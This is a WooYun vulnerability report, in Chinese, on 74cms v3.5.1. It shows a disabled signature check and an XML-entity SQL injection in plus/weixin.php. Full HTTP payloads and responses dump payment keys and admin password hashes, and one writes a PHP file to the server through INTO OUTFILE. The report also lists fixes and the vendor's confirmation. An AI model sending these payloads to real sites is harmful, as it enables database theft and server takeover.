当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(22) 关注此漏洞

缺陷编号: WooYun-2014-81223

漏洞标题: 骑士CMS(20141027)多个漏洞组合可致所有数据泄露+getshell

相关厂商: 74cms.com

漏洞作者: 龟兔赛跑

提交时间: 2014-10-30 18:47

公开时间: 2015-01-28 18:48

漏洞类型: 设计缺陷/逻辑错误

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: webshell SQL注入 逻辑错误 php源码审核 webshell webshell

6人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-30: 细节已通知厂商并且等待厂商处理中
2014-11-03: 厂商已经确认,细节仅向厂商公开
2014-11-06: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-12-28: 细节向核心白帽子及相关领域专家公开
2015-01-07: 细节向普通白帽子公开
2015-01-17: 细节向实习白帽子公开
2015-01-28: 细节向公众公开

简要描述:

专注挖魂。。。

74cms_v3.5.1_20141027.zip 无限制SQL注入

详细说明:

刚下了个74cms_v3.5.1_20141027.zip,diff了一下发现了下面的改动:



code 区域
diff -Nurp upload.1020/plus/weixin.php upload.1027/plus/weixin.php


--- upload.1020/plus/weixin.php	2014-10-18 12:14:22.000000000 +0800


+++ upload.1027/plus/weixin.php	2014-10-25 14:45:22.000000000 +0800


@@ -21,10 +21,10 @@ class wechatCallbackapiTest extends mysq


     }


     public function responseMsg()


     {


-		if(!$this->checkSignature())


-		{


-        	exit();


-        }


+		// if(!$this->checkSignature())


+		// {


+  //       	exit();


+  //       }


 		$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);


 		if (!empty($postStr))


 		{





注释调了checkSignature(),是为了啥?????



http://**.**.**.**/bugs/wooyun-2014-075009曾经分析过这里的XXE漏洞以及SQLI,不过,被次利用的是另外两个BUG。



先看code.



code 区域
class wechatCallbackapiTest extends mysql


{


	public function valid()


    {


        $echoStr = $_GET["echostr"];


        if($this->checkSignature())


		{


        	exit($echoStr);


        }


    }


    public function responseMsg()


    {


		// if(!$this->checkSignature())


		// {


  //       	exit();


  //       }


		$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);


		if (!empty($postStr))


		{


			// libxml_disable_entity_loader(true);


            $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);


            $fromUsername = $postObj->FromUserName;


            $toUsername = $postObj->ToUserName;


            $keyword = trim($postObj->Content);


			$keyword = utf8_to_gbk($keyword);


			$keyword = addslashes($keyword);


            $time = time();


			$event = trim($postObj->Event);


			


			if ($event === "subscribe")


			{


				$word= "»ØžŽj·µ»ØœôŒ±ÕÐÆž£¬»ØžŽn·µ»Ø×îÐÂÕÐÆž£¡Äú¿ÉÒÔ³¢ÊÔÊäÈëְλÃû³ÆÈç¡°»áŒÆ¡±£¬ÏµÍ³œ«»á·µ»ØÄúÒªÕÒµÄÐÅÏ¢£¬ÎÒÃÇŬÁŠŽòÔì×îÈËÐÔ»¯µÄ·þÎñƜ̚£¬Ð»Ð»¹Ø×¢¡£";


				$this->exit_word_message($word,$fromUsername,$toUsername,$time);			


			}	


			$default_pic=ROOT."/data/images/".DEFAULT_PIC;


			$first_pic=ROOT."/data/images/".FIRST_PIC;





			if($event === "CLICK"){


				if($_CFG['weixin_apiopen']=='0')


				{


					$word="Íø՟΢ÐŜӿÚÒÑŸ­¹Ø±Õ";


					$this->exit_word_message($word,$fromUsername,$toUsername,$time);


				}


				if($postObj->EventKey=="binding"){


					$usinfo = $this->get_user_info($fromUsername);


					if(!empty($usinfo)){


						$word="ÄúÒÑŸ­°ó¶š¹ýÁË!";


					}else{


						$word="ÇëÊäÈëÄúµÄÕ˺ÅÃÜÂë.


ÀýÈç:ÕÅÈý/123456";


					}


					$this->exit_word_message($word,$fromUsername,$toUsername,$time);


				}


...


	private function get_user_info($fromUsername){


		$usinfo = array();


		$usinfo_obj = $this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");


		while($row = $this->fetch_array($usinfo_obj)){


			$usinfo = $row;


		}


		return $usinfo;


	}





code 区域
$postStr = addslashes($GLOBALS["HTTP_RAW_POST_DATA"]);



对整个POST_DATA做了addslashes。



code 区域
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);


            $fromUsername = $postObj->FromUserName;





然后:

code 区域
$usinfo = $this->get_user_info($fromUsername);


===>


$this->query("select * from ".table('members')." where weixin_openid='".$fromUsername."' limit 1");





$fromUsername从simplexml_load_string()后就直接进入了SQL中,addslashes($GLOBALS["HTTP_RAW_POST_DATA"])就解决了所有问题么?答案是否定的。因为XML中特殊字符也可以编码:

code 区域
特殊字符 特殊含义 实体编码


> 开始标记 >


< 结束标记 &lt;


" 引号 &quot;


' 撇号 &apos;


& 和号 &amp;





也就是说在XML中使用&apos就把'号注入进去了,并且这里post data没有任何过滤,可以注入任何SQL语句,所以我们可以导出整个数据库,甚至getshell.



看到下面的代码,也许有人会说,这里是有条件的,因为这里判断了$_CFG['weixin_apiopen']=='0')。



code 区域
if($event === "CLICK"){


				if($_CFG['weixin_apiopen']=='0')


				{


					$word="Íø՟΢ÐŜӿÚÒÑŸ­¹Ø±Õ";


					$this->exit_word_message($word,$fromUsername,$toUsername,$time);


				}





不过,这里的$_CFG['weixin_apiopen']真的有效么?下面的代码可以告诉我们:

code 区域
<?php





$_CFG = 0;





class Test {


    function myprint() {


        echo "$_CFG in class=" . $_CFG;


    }


}





echo "in file =" . $_CFG;


$tt = new Test();


$tt->myprint();





?>





在浏览器访问一下**.**.**.**:8081/74cms/test.php,结果为:



code 区域
in file =0


Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7





Notice: Undefined variable: _CFG in /var/www/html/74cms/test.php on line 7


in class=





也就是在class object里面访问$_CFG是无效的。

那么,那么,

code 区域
$_CFG['weixin_apiopen']=='0'



这个条件就是永远都不会成立的,不管你后台开不开weixin_api。



好了,所有条件限制都排除了,可以直接注入了。



一下为74cms_v3.5.1_20141027默认安装测试:



code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 155





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos;</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>binding</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 07:33:13 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=2ctd2pnvhip2mpvbs57rlvmq91; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 79


Content-Type: text/html;charset=gb2312





Error��Query error:select * from qs_members where weixin_openid='1111'' limit 1





UNION SELECT:

code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 226





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>binding</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 07:36:59 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=3nh4puf9it16ea6omld6h26412; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 316


Content-Type: text/html;charset=gb2312





<xml>


		<ToUserName><![CDATA[1111' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#]]></ToUserName>


		<FromUserName><![CDATA[111]]></FromUserName>


		<CreateTime>1414568219</CreateTime>


		<MsgType><![CDATA[text]]></MsgType>


		<Content><![CDATA[您已经绑定过了!]]></Content>


		</xml>





获取支付相关的key:

code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 303





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select (select group_concat(id,0x7c,typename,0x7c,ytauthkey,0x5d) from qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>apply_jobs</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 07:49:52 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=u4o47rf3pk29shkk433cfompj0; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 137


Content-Type: text/html;charset=gb2312





Error��Query error:select * from qs_personal_jobs_apply where personal_uid=1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]





错误信息里面的

code 区域
1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]



就是表里面的数据。



管理员表:

code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 303





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select (select group_concat(admin_name,0x7c,pwd,0x7c,pwd_hash,0x5d) from qs_admin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>apply_jobs</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 08:09:07 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=dgh5nio4aflji6ppjatq9iee14; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 121


Content-Type: text/html;charset=gb2312





Error��Query error:select * from qs_personal_jobs_apply where personal_uid=admin|81cdc144e960168e163223605e5daeba|taZeD1]





getshell:



code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 324





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/shell.php&apos; #</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>binding</EventKey>


</xml>





返回错误:

code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 08:29:11 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=tkimiq88f2v707inhs5avrvbd5; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 238


Content-Type: text/html;charset=gb2312





Error��Query error:select * from qs_members where weixin_openid='1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE '/var/www/html/74cms/data/shell.php' #' limit 1







这是因为写shell.php需要有写权限,data目录不行。



但是,但是,我们也可以找一个肯定有写权限的目录:

注册一个普通用户,长传一个头像,这是会建立0777权限的目录:'data/avatar/100/2014',shell就传到这个目录吧。



code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 340





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE &apos;/var/www/html/74cms/data/avatar/100/2014/shell.php&apos; #</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>binding</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 08:25:09 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=8m121t281t85udkja8rt8ub147; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 448


Content-Type: text/html;charset=gb2312





<xml>


		<ToUserName><![CDATA[1111' union select 0x3C3F70687020706870696E666F28293B3F3E,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 INTO OUTFILE '/var/www/html/74cms/data/avatar/100/2014/shell.php' #]]></ToUserName>


		<FromUserName><![CDATA[111]]></FromUserName>


		<CreateTime>1414571109</CreateTime>


		<MsgType><![CDATA[text]]></MsgType>


		<Content><![CDATA[请输入您的账号密码.


例如:张三/123456]]></Content>


		</xml>





浏览器访问:

**.**.**.**:8081/74cms/data/avatar/100/2014/shell.php



1.png

漏洞证明:

获取支付相关的key:

code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 303





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select (select group_concat(id,0x7c,typename,0x7c,ytauthkey,0x5d) from qs_payment),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>apply_jobs</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 07:49:52 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=u4o47rf3pk29shkk433cfompj0; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 137


Content-Type: text/html;charset=gb2312





Error��Query error:select * from qs_personal_jobs_apply where personal_uid=1|remittance|],2|chinabank|],3|tenpay|xndcgc],4|alipay|kiohad]





管理员表:

code 区域
POST /74cms/plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1


Content-Type: application/xml 


User-Agent: http4e/5.0.12


Host: **.**.**.**:8081


Content-Length: 303





<xml>


<ToUserName>111</ToUserName>


<FromUserName>1111&apos; union select (select group_concat(admin_name,0x7c,pwd,0x7c,pwd_hash,0x5d) from qs_admin),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#</FromUserName>


<Content>2222</Content>


<Event>CLICK</Event>


<EventKey>apply_jobs</EventKey>


</xml>





code 区域
HTTP/1.1 200 OK


Date: Wed, 29 Oct 2014 08:09:07 GMT


Server: Apache/2.4.10 (Fedora) PHP/5.5.18 mod_wsgi/3.5 Python/2.7.5 mod_perl/2.0.9-dev Perl/v5.18.4


X-Powered-By: PHP/5.5.18


Set-Cookie: PHPSESSID=dgh5nio4aflji6ppjatq9iee14; path=/


Expires: Thu, 19 Nov 1981 08:52:00 GMT


Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0


Pragma: no-cache


Content-Length: 121


Content-Type: text/html;charset=gb2312





Error��Query error:select * from qs_personal_jobs_apply where personal_uid=admin|81cdc144e960168e163223605e5daeba|taZeD1]





getshell:



1.png

修复方案:

1. checkSignature()不需要了?



2. if($_CFG['weixin_apiopen']=='0') always不成立,文件最前面用:

define("APIOPEN", $_CFG['weixin_apiopen']);吧。



3. $postObj的每个元素使用前先addslashes()



4. 上传图片文件的目录不需要用0777的权限吧。

版权声明:转载请注明来源 龟兔赛跑@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-11-03 15:25

厂商回复:

感谢反馈!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2014-10-30 19:19 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:941 漏洞数:108 )
    2

    shell 终于来了

    1# 回复此人
  2. 2014-11-01 04:16 | h4ckhell00 ( 路人 | Rank:10 漏洞数:3 | 最温暖的两个字是什么?1、我在。2、别怕。...)
    0

    shell 终于来了

    2# 回复此人
  3. 2014-11-01 07:47 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 )
    0

    龟兔,你拿了多少钱啊

    3# 回复此人

登录后才能发表评论,请先 登录